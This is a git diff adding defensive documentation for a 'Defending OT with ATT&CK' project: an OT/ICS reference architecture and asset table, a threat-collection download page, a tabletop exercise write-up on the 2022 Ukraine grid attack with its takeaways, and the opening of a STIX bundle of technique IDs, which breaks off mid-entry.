diff --git a/docs/_static/assets.png b/docs/_static/assets.png new file mode 100644 index 0000000..0586d8b Binary files /dev/null and b/docs/_static/assets.png differ diff --git a/docs/_static/caddywiper.png b/docs/_static/caddywiper.png new file mode 100644 index 0000000..9bb4c5f Binary files /dev/null and b/docs/_static/caddywiper.png differ diff --git a/docs/_static/campaign.png b/docs/_static/campaign.png new file mode 100644 index 0000000..8d4bb58 Binary files /dev/null and b/docs/_static/campaign.png differ diff --git a/docs/_static/enterprise_ics.png b/docs/_static/enterprise_ics.png new file mode 100644 index 0000000..5e68772 Binary files /dev/null and b/docs/_static/enterprise_ics.png differ diff --git a/docs/_static/exercise.png b/docs/_static/exercise.png new file mode 100644 index 0000000..8528779 Binary files /dev/null and b/docs/_static/exercise.png differ diff --git a/docs/_static/hybrid_visual.png b/docs/_static/hybrid_visual.png new file mode 100644 index 0000000..76eb62d Binary files /dev/null and b/docs/_static/hybrid_visual.png differ diff --git a/docs/_static/ref_arch.png b/docs/_static/ref_arch.png new file mode 100644 index 0000000..83b30e6 Binary files /dev/null and b/docs/_static/ref_arch.png differ diff --git a/docs/architecture.rst b/docs/architecture.rst new file mode 100644 index 0000000..33d7269 --- /dev/null +++ b/docs/architecture.rst @@ -0,0 +1,184 @@ +Reference Architecture +====================== + +Defending OT with ATT&CK developed a basic reference architecture to provide a common, +reusable view of assets and technologies used in IT/OT hybrid environments where a threat +actor can impact operations. The reference architecture identifies the attack surface and +serves as a framework for depicting assets using functional components across the technology +stack of an OT environment in hierarchical levels. It can be used to help understand the +segmentation of industrial processes and IT systems, delineated boundaries between different +operational zones, and interactions between IT and OT systems. + +.. image:: ./_static/ref_arch.png + +The Defending OT with ATT&CK reference architecture is adapted from the `Purdue Enterprise Reference Architecture (PERA) model `_, +which historically has been the primary reference to describe the structure of OT networks. +ATT&CK for Enterprise and ATT&CK for ICS platforms and assets were reviewed to aid in determining +relevant assets and technologies. Consideration was also given for international standards and +sector-based use cases (e.g., factory automation, maritime transport). + +Architecture Assets +------------------- + +Control systems standards and guidance containing reference architectures with assets were reviewed +when developing the assets that comprise Defending OT with ATT&CK's reference architecture. These sources +include the `ISA/IEC 62443 series of standards `_ for protecting industrial automation and control systems (IACS) +from cyberthreats and `NIST SP 800-82 Rev. 3: Guide to Operational Technology (OT) Security `_ which +encompasses security for a broad range of systems and devices. The following considerations were also +taken when defining the Defending OT with ATT&CK's architecture assets: + +* Enterprise IT and OT Security + + * Enterprise IT and OT security attack surface management, OT and ICS areas of interest, + network assets, wireless protocols in energy sector, manufacturing systems + +* Network Segmentation, Governance, and Compliance + + * Measured inclusion due to the limitations of mapping these assets to attack vectors + +* Architecture and Attack Vectors + + * Abstraction of cloud OT and on-prem OT to account for different attack vectors + +* Adversaries and Goals in IT compared to OT + + * Distinction emphasized between IT networks where adversaries seek information exfiltration + and OT networks where objectives are focused on operations disruption + +* Impacting ICS + + * Understanding impact to assets, particulary in context of ICS and application of ATT&CK + in IT and OT environments + +.. image:: ./_static/assets.png + +The below table provides descriptions for each of the 21 identified Defending OT with ATT&CK Architecture Assets. All assets can be mapped to +ATT&CK for Enterprise's platforms and/or ATT&CK for ICS' assets. There are nine assets where ATT&CK for ENterprise and ATT&CK for ICS overlap: + +* Control Server +* Human-Machine Interface (HMI) +* Jump Hosts +* Application Server +* Engineering Workstation +* Routers in OT networks +* Data Historian +* VPN Server +* Firewall + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Asset Name + Description + ++======================================+===================================================================================================+ ++ Application + O365 is a family of applications by Microsoft including productivity software, collaboration, and + ++ [O365] + cloud-based services. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Application Server + Application servers are used across many different sectors to host various diverse software + ++ [ICS & Enterprise] + applications necessary to supporting the ICS. Example functions can include data analytics and + ++ + reporting, alarm management, and the management/coordination of different control servers. The + ++ + application server typically runs on a modern server operating system (e.g., MS Windows Server). + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Cloud - IaaS + IaaS, or Infrastructure as a Service, is a cloud computing model that provides on-demand access + ++ [AWS/Azure/GCP] + to computing resources such as servers, storage, networking, and virtualization. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Cloud + Cloud services are infrastructure, platforms, or software that are hosted on-premise or by + ++ [SaaS/M365/Google Workspace] + third-party providers, made available to users through network connections and/or APIs. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Container + A container is standard unit of virtualized software that packages up code and its dependencies + ++ + so the application runs quickly and reliably from one computing environment to another. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Control Server + Control servers are typically a software platform that runs on a modern server operating system + ++ [ICS & Enterprise] + (e.g., MS Windows Server). The server typically uses one or more automation protocols (e.g., + ++ + Modbus, DNP3) to communicate with the various low-level control devices such as Remote Terminal + ++ + Units (RTUs) and Programmable Logic Controllers (PLCs). The control server also usually provides + ++ + an interface/network service to connect with an HMI. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Data Gateway + Data Gateway is a device that supports the communication and exchange of data between different + ++ [ICS & Enterprise] + systems, networks, or protocols within the ICS. Different types of data gateways are used to + ++ + perform various functions, including Protocol Translation, Media Converter, and Data Aggregation. + ++ + Data gateways are often critical to the forwarding/transmission of critical control or monitoring + ++ + data within the ICS. Further, these devices often have remote various network services that are + ++ + used to communicate across different zones or networks. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Data Historian + Data historians, or historian, are systems used to collect and store data, including telemetry, + ++ [ICS & Enterprise] + events, alerts, and alarms about the operational process and supporting devices. The historian + ++ + typically utilizes a database to store this data, and commonly provide tools and interfaces to + ++ + support the analysis of the data. Data historians are often used to support various engineering + ++ + or business analysis functions and therefore commonly needs access from the corporate network. + ++ + Data historians often work in a hierarchical paradigm where lower/site level historians collect + ++ + and store data which is then aggregated into a site/plant level historian. Therefore, data + ++ + historians often have remote services that can be accessed externally from the ICS network. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Engineering Workstation (EWS) + An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or + ++ [ICS & Enterprise] + diagnostics functions for a control system. The EWS will likely require dedicated application + ++ + software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data + ++ + or files between the control system devices and other networks. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Field I/O (Sensors and Actuators) + Field I/O are devices that communicate with a controller or data aggregator to either send input + ++ [ICS] + data or receive output data. Input data may include readings about a given environment/device + ++ + state from sensors, while output data may include data sent back to actuators for them to either + ++ + undertake actions or change parameter values. These devices are frequently embedded devices + ++ + running on lightweight embedded operating systems or RTOSes. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Firewall + A firewall is a network security system, running locally on an endpoint or remotely as a service + ++ [ICS & Network] + (e.g., cloud environment), that monitors and controls incoming/outgoing network traffic based + ++ + on predefined rules. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Human-Machine Interface (HMI) + HMIs are systems used by an operator to monitor the real-time status of an operational process + ++ [ICS & Enterprise] + and to perform necessary control functions, including the adjustment of device parameters. An HMI + ++ + can take various forms, including a dedicated screen or control panel integrated with a specific + ++ + device/controller, or a customizable software GUI application running on a standard operating + ++ + system (e.g., MS Windows) that interfaces with a control/SCADA server. The HMI is critical to + ++ + ensuring operators have sufficient visibility and control over the operational process. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Identity and Access Management + Identity and access management systems to determine whether a user should be granted access + ++ [Azure AD/Entra ID] + to a resource. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Intelligent Electronic Device (IED) + An IED is a type of specialized field device that is designed to perform specific operational + ++ [ICS] + functions, frequently for protection, monitoring, or control within the electric sector. IEDs are + ++ + typically used to both acquire telemetry and execute tailored control algorithms/actions based on + ++ + customizable parameters/settings. An IED is usually implemented as a dedicated embedded device + ++ + and supports various network automation protocols to communicate with RTUs and Control Servers. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Jump Host + Jump hosts are devices used to support remote management sessions into ICS networks or devices. + ++ [ICS & Enterprise] + The system is used to access the ICS environment securely from external networks, such as the + ++ + corporate network. The user must first remote into the jump host before they can access ICS + ++ + devices. The jump host may be a customized Windows server using common remote access protocols + ++ + (e.g., RDP) or a dedicated access management device. The jump host typically performs various + ++ + security functions to ensure the authenticity of remote sessions, including authentication, + ++ + enforcing access controls/permissions, and auditing all access attempts. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Programmable Logic Controller (PLC) + A PLC is an embedded programmable control device. PLCs typically utilize a modular architecture + ++ [ICS] + with separate modules used to support its processing capabilities, communication mediums, and I/O + ++ + interfaces. PLCs allow for the deployment of customized programs/logic to control or monitor an + ++ + operational process. This logic is defined using industry specific programming languages, such as + ++ + IEC 61131 , which define the set of tasks and program organizational units (POUs) included in the + ++ + device’s programs. PLCs also typically have distinct operating modes (e.g., Remote, Run, Program, + ++ + Stop) which are used to determine when the device can be programmed or whether it should execute + ++ + the custom logic. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Remote Terminal Unit (RTU) + An RTU is a device that typically resides between field devices (e.g., PLCs, IEDs) and control/ + ++ [ICS & Enterprise] + SCADA servers and supports various communication interfacing and data aggregation functions. RTUs + ++ + are typically responsible for forwarding commands from the control server and the collection of + ++ + telemetry, events, and alerts from the field devices. An RTU can be implemented as a dedicated + ++ + embedded device, as software platform that runs on a hardened/ruggedized computer, or using a + ++ + custom application program on a PLC. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Routers & Switches + A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data + ++ [ICS & Network] + packets through that inter-network. The most common form of router operates on IP packets. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Safety Controllers + Safety controllers are typically a type of field device used to perform the safety critical + ++ [ICS] + function. Safety controllers often support the deployment of custom programs/logic, similar to a + ++ + PLC, but can also be tailored for sector specific functions/applications. The safety controllers + ++ + typically utilize redundant hardware and processors to ensure they operate reliably if a + ++ + component fails. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Servers and Endpoints + A server is a system that provides resources, data, services, or programs to other systems over a + ++ [OS: Linux, Windows] + network. Endpoints are physical devices that connect to and exchange information with a network. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ ++ Virtual Private Network (VPN) Server + A VPN server is a device that is used to establish a secure network tunnel between itself and + ++ [ICS & Enterprise] + other remote VPN devices, including field VPNs. VPN servers can be used to establish a secure + ++ + connection with a single remote device, or to securely bridge all traffic between two separate + ++ + networks together by encapsulating all data between those networks. VPN servers typically support + ++ + remote network services that are used by field VPNs to initiate the establishment of the secure + ++ + VPN tunnel between the field device and server. + ++--------------------------------------+---------------------------------------------------------------------------------------------------+ + diff --git a/docs/collection.rst b/docs/collection.rst new file mode 100644 index 0000000..95a10c8 --- /dev/null +++ b/docs/collection.rst @@ -0,0 +1,90 @@ +Threat Collection +================= + +The Defending OT with ATT&CK threat collection is a customized collection of MITRE ATT&CK® +techniques tailored to the attack surface and threat model for OT environments. Historical attacks +against OT and adversarial tactics, techniques, and procedures (TTPs) as contained in +ATT&CK for Enterprise, ATT&CK for ICS, and other relevant ATT&CK datasets such as Cloud +and Containers were analyzed to identify and define a reference architecture and technology +domains of interest specific to OT. The resultant collection can be used by organizations +that use OT to evaluate, plan, and employ security controls based on known, real-world +adversary behaviors targeting those environments. + +Defending OT with ATT&CK provides a defined threat collection to assist defenders in +understanding which techniques adversaries could use within an IT/OT hybrid architecture. +This includes: + +* techniques that occur on enterprise systems used to manage OT, + +* techniques on Industrial Control Systems (ICS), and + +* techniques on OT assets that run similar operating systems, protocols, and applications as enterprise IT assets. + + .. <> + tagged techniques for OT environments + Total ATT&CK (sub-)techniques -> Mapped to each asset and count (i.e., 510 techniques mapped to each assets). + plus image + downloads: + - STIX bundle + - multi-domain ATT&CK matrix for Navigator + +Download the Threat Collection +------------------------------ + +.. raw:: html + +

+ + Download ATT&CK Workbench Collection (6.2mb) + + + Download Hybrid ATT&CK Matrix - EXCEL (32kb) + + + Download JSON Threat Collection (8.875mb) +

+ +Building the Threat Collection +------------------------------ + +Defending OT with ATT&CK builds upon prior work developed by the Center, including +`Defending IaaS with ATT&CK `_ and `ATT&CK Workbench `_. + +**Defending IaaS with ATT&CK** + +Defending OT with ATT&CK uses the methodology and tooling created as part of the Center's +`Defending IaaS with ATT&CK project `_ as a basis. The Defending IaaS project methodology provides +steps to identify and select techniques across multiple ATT&CK matrices that align to a defined +attack surface, proving to be a solid foundation for developing Defending OT project resources. + +The Center developed Defending IaaS With ATT&CK project to provide the community with a +collection of MITRE ATT&CK® techniques tailored to the unique attack surface and threat model +for Infrastructure-as-a-Service (IaaS). This collection can be used to plan and evaluate security +controls for organizations that use IaaS based on the known adversary behaviors described by ATT&CK. + +**ATT&CK Workbench** + +The Defending OT with ATT&CK project team used `ATT&CK Workbench `_ to explore and map adversarial +techniques, target assets, and campaigns. The team employed ATT&CK Workbench's search and +filter features for ATT&CK for Enterprise and ATT&CK for ICS domains, determined mapping of +assets to multi-domains from ATT&CK for Enterprise and ATT&CK for ICS techniques, and added +rationale in Workbench's note sections, to generate the shared mapping file. + +The Center created ATT&CK Workbench to enable users to explore, create, annotate, and share +extensions of MITRE ATT&CK®. ATT&CK Workbench allows users to manage and extend their own +local version of ATT&CK and keep it synchronized with the ATT&CK knowledge base. ATT&CK Workrbench +is an open source tool publicly available on `GitHub `_. + +ATT&CK Workbench enables a number of important use cases within the ATT&CK community, such as: + +* **Cyber Threat Intelligence:** Take notes on techniques, groups, and other objects to collaborate within a threat intelligence team. + +* **Red Teaming:** Track and manage coverage of Red Team engagements the same way you track your ATT&CK coverage. + +* **Defensive Planning:** Stay up to date with the evolving threat landscape by downloading new releases of ATT&CK automatically. + +* **Collaboration with ATT&CK and the community:** Share your custom datasets with the ATT&CK community and download datasets created by others. + + + + diff --git a/docs/exercise.rst b/docs/exercise.rst new file mode 100644 index 0000000..5e8acac --- /dev/null +++ b/docs/exercise.rst @@ -0,0 +1,80 @@ +Cyber Tabletop Exercise +======================= + +Organizations need to proactively understand how to defend against advanced +persistent threat techniques that can be used to impact their operational +technology (OT) environment, regardless of whether these cyber-attacks affect +assets within different technology domains. To demonstrate how this project's +resources can be used to meet that need, a cyber tabletop exercise was conducted +by project participants. Exercise goals included assessing and improving +information technology (IT) and OT defensive strategies for advanced nation state +threat actor groups that use adversarial techniques overlapping Enterprise and +Industrial Control Systems (ICS) domains. + +The ATT&CK-based tabletop exercise scenario was based upon the +`2022 Ukraine Electric Power Attack `_ campaign. This real-world campaign by the +Russian threat actor group known as Sandworm Team used a combination of malware +and 15 ATT&CK techniques overlapping ATT&CK for Enterprise and ICS domains to gain +access to a Ukranian electric utility and send unauthorized commands to substation +devices, disrupting power across Ukraine. The attackers targeted IT environment +systems and used those system to conduct attacks against OT capabilities. + +During the exercise, project participants reviewed 20 ATT&CK techniques observed +during this adversarial campaign and the associated technical risks. This involved a +detailed review of each adversarial behavior, assets impacted in architecture, and +mitigating cyber defense guidance to minimize the risk. This information was used to +score potential adversarial risk, along with the protective and detective security +mechanisms captured. Upon conclusion of the exercise, participants held a brief hot wash, +identified areas of improvement for defense-in-depth, and developed recommendations +for security across multiple domains of the IT/OT environment. + +Conducting the Exercise +----------------------- + +The exercise was conducted using the Defending OT with ATT&CK `reference architecture <./architecture.rst>`_. +This reference architecture is depicted in the image below. Exercise participants +assumed the role of cybersecurity experts for an organization with a technical environment +similar to the hacked power plant infrastructure. Red boxes are used to indicate +assets impacted during the campaign. + +.. image:: ./_static/exercise.png + +The ATT&CK techniques investigated during the exercise are provided in the table below, +organized under tactics - the reasons an advesary performs the action. A mix of techniques +in the ATT&CK for Enterprise and ICS domains were used to infiltrate the electric utility +and then send unauthorized commands from their SCADA (supervisory control and data acquisition) +control system architecture. + +.. image:: ./_static/campaign.png + +The following depicts an example of the presentation of adversarial threats for participant +discussion and evaluation, including consideration of potential mitigations, detection methods, +and risk scenarios: + +.. image:: ./_static/caddywiper.png + +Defensive Takeaways +------------------- + +* Emphasize a threat-informed approach when evaluating the defense-in-depth of organizational security controls, particularly when securing and hardening enterprise assets. This was highlighted in the assessment of how threat actors exploit internet-facing assets during the initial stages of the cyber kill chain. + + * Without a threat-informed approach, security controls may not effectively address specific vulnerabilities exploited by threat actors, increasing the risk of successful cyber attacks. + +* Stress the importance of baselining and maintaining situational awareness in your operational environment through continuous monitoring of sensor health and status. This is crucial for identifying threat actor behaviors, including the use of living off the land (LoTL) techniques that blend with normal operational activities. + + * Inadequate baselining and monitoring may lead to delayed detection of stealthy threat actor activities, potentially resulting in prolonged compromise and data exfiltration. + +* Prioritize privileged account management for shared administrator accounts and validate network segmentation across various zones, from enterprise (level 5) to operational and control (level 3), to mitigate lateral movement by threat actors or ingress of malicious artifacts. + + * Poor privileged account management and inadequate network segmentation increase the risk of unauthorized access and lateral movement within the network, potentially leading to widespread compromise and data breach. + +Offensive Takeaways +------------------- + +* Consider repeating this exercise based on other cyber-attacks on Ukrainian Electric Plants in 2016 and 2020, and reviewing techniques associated with the Russian threat actor Sandworm. + + * Ignoring historical attack patterns and specific threat actor techniques may result in overlooking critical vulnerabilities and attack vectors, leaving the organization vulnerable to similar cyber attacks. + +* Plan the next steps with a hands-on purple team exercise, where selected adversarial techniques are executed by a red team or programmatically using tools like Caldera and Caldera for OT. Evaluate the effectiveness of security controls and have the results assessed by a blue team of cyber-defenders. + + * Without conducting a hands-on purple team exercise, the effectiveness of current security controls may not be accurately assessed, leading to gaps in defensive capabilities and increased exposure to cyber threats. \ No newline at end of file diff --git a/docs/extra/defending-ot-with-att&ck-0.3.json b/docs/extra/defending-ot-with-att&ck-0.3.json new file mode 100644 index 0000000..3907eee --- /dev/null +++ b/docs/extra/defending-ot-with-att&ck-0.3.json @@ -0,0 +1,156142 @@ +{ + "type": "bundle", + "id": "bundle--33bdd598-6e9b-4ba6-b697-63ea87644956", + "objects": [ + { + "modified": "2024-07-02T18:02:13.377Z", + "name": "defending-ot-with att&ck-0.3", + "description": "", + "x_mitre_contents": [ + { + "object_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "object_modified": "2024-05-21T16:23:41.133Z" + }, + { + "object_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "object_modified": "2023-11-15T14:33:53.354Z" + }, + { + "object_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "object_modified": "2024-05-21T16:22:21.025Z" + }, + { + "object_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "object_modified": "2023-10-13T17:56:58.380Z" + }, + { + "object_ref": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "object_modified": "2023-09-15T19:02:53.995Z" + }, + { + "object_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "object_modified": "2024-04-11T18:13:25.130Z" + }, + { + "object_ref": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "object_modified": "2023-10-15T20:24:13.473Z" + }, + { + "object_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "object_modified": "2023-03-30T21:01:39.967Z" + }, + { + "object_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "object_modified": "2024-04-16T12:23:13.621Z" + }, + { + "object_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "object_modified": "2024-04-18T14:26:21.852Z" + }, + { + "object_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "object_modified": "2023-09-29T19:50:06.736Z" + }, + { + "object_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "object_modified": "2024-02-28T21:13:02.648Z" + }, + { + "object_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "object_modified": "2023-08-14T15:35:28.965Z" + }, + { + "object_ref": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", + "object_modified": "2022-10-20T21:20:22.578Z" + }, + { + "object_ref": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "object_modified": "2023-03-03T00:31:33.071Z" + }, + { + "object_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "object_modified": "2023-09-29T21:14:57.263Z" + }, + { + "object_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "object_modified": "2023-10-13T17:56:58.586Z" + }, + { + "object_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "object_modified": "2023-10-13T17:56:58.786Z" + }, + { + "object_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "object_modified": "2023-10-01T14:01:12.167Z" + }, + { + "object_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "object_modified": "2023-10-13T17:56:58.991Z" + }, + { + "object_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "object_modified": "2024-04-15T23:42:39.831Z" + }, + { + "object_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "object_modified": "2023-08-14T17:54:22.970Z" + }, + { + "object_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "object_modified": "2023-10-16T16:57:41.743Z" + }, + { + "object_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "object_modified": "2024-04-18T23:47:41.667Z" + }, + { + "object_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "object_modified": "2023-10-12T21:17:14.868Z" + }, + { + "object_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "object_modified": "2023-10-03T03:29:57.078Z" + }, + { + "object_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "object_modified": "2024-04-16T12:25:24.480Z" + }, + { + "object_ref": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", + "object_modified": "2024-04-15T23:49:14.558Z" + }, + { + "object_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "object_modified": "2023-10-16T16:41:53.957Z" + }, + { + "object_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "object_modified": "2024-04-19T04:03:07.164Z" + }, + { + "object_ref": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "object_modified": "2023-10-20T17:04:13.976Z" + }, + { + "object_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "object_modified": "2023-10-13T17:56:59.193Z" + }, + { + "object_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "object_modified": "2022-10-21T14:32:48.393Z" + }, + { + "object_ref": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "object_modified": "2024-01-23T22:53:18.389Z" + }, + { + "object_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "object_modified": "2024-02-15T14:14:03.942Z" + }, + { + "object_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "object_modified": "2024-04-16T12:56:56.861Z" + }, + { + "object_ref": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "object_modified": "2023-10-13T17:56:59.396Z" + }, + { + "object_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "object_modified": "2023-09-05T20:45:22.041Z" + }, + { + "object_ref": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", + "object_modified": "2024-04-19T12:24:40.659Z" + }, + { + "object_ref": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", + "object_modified": "2023-04-17T15:32:39.470Z" + }, + { + "object_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": 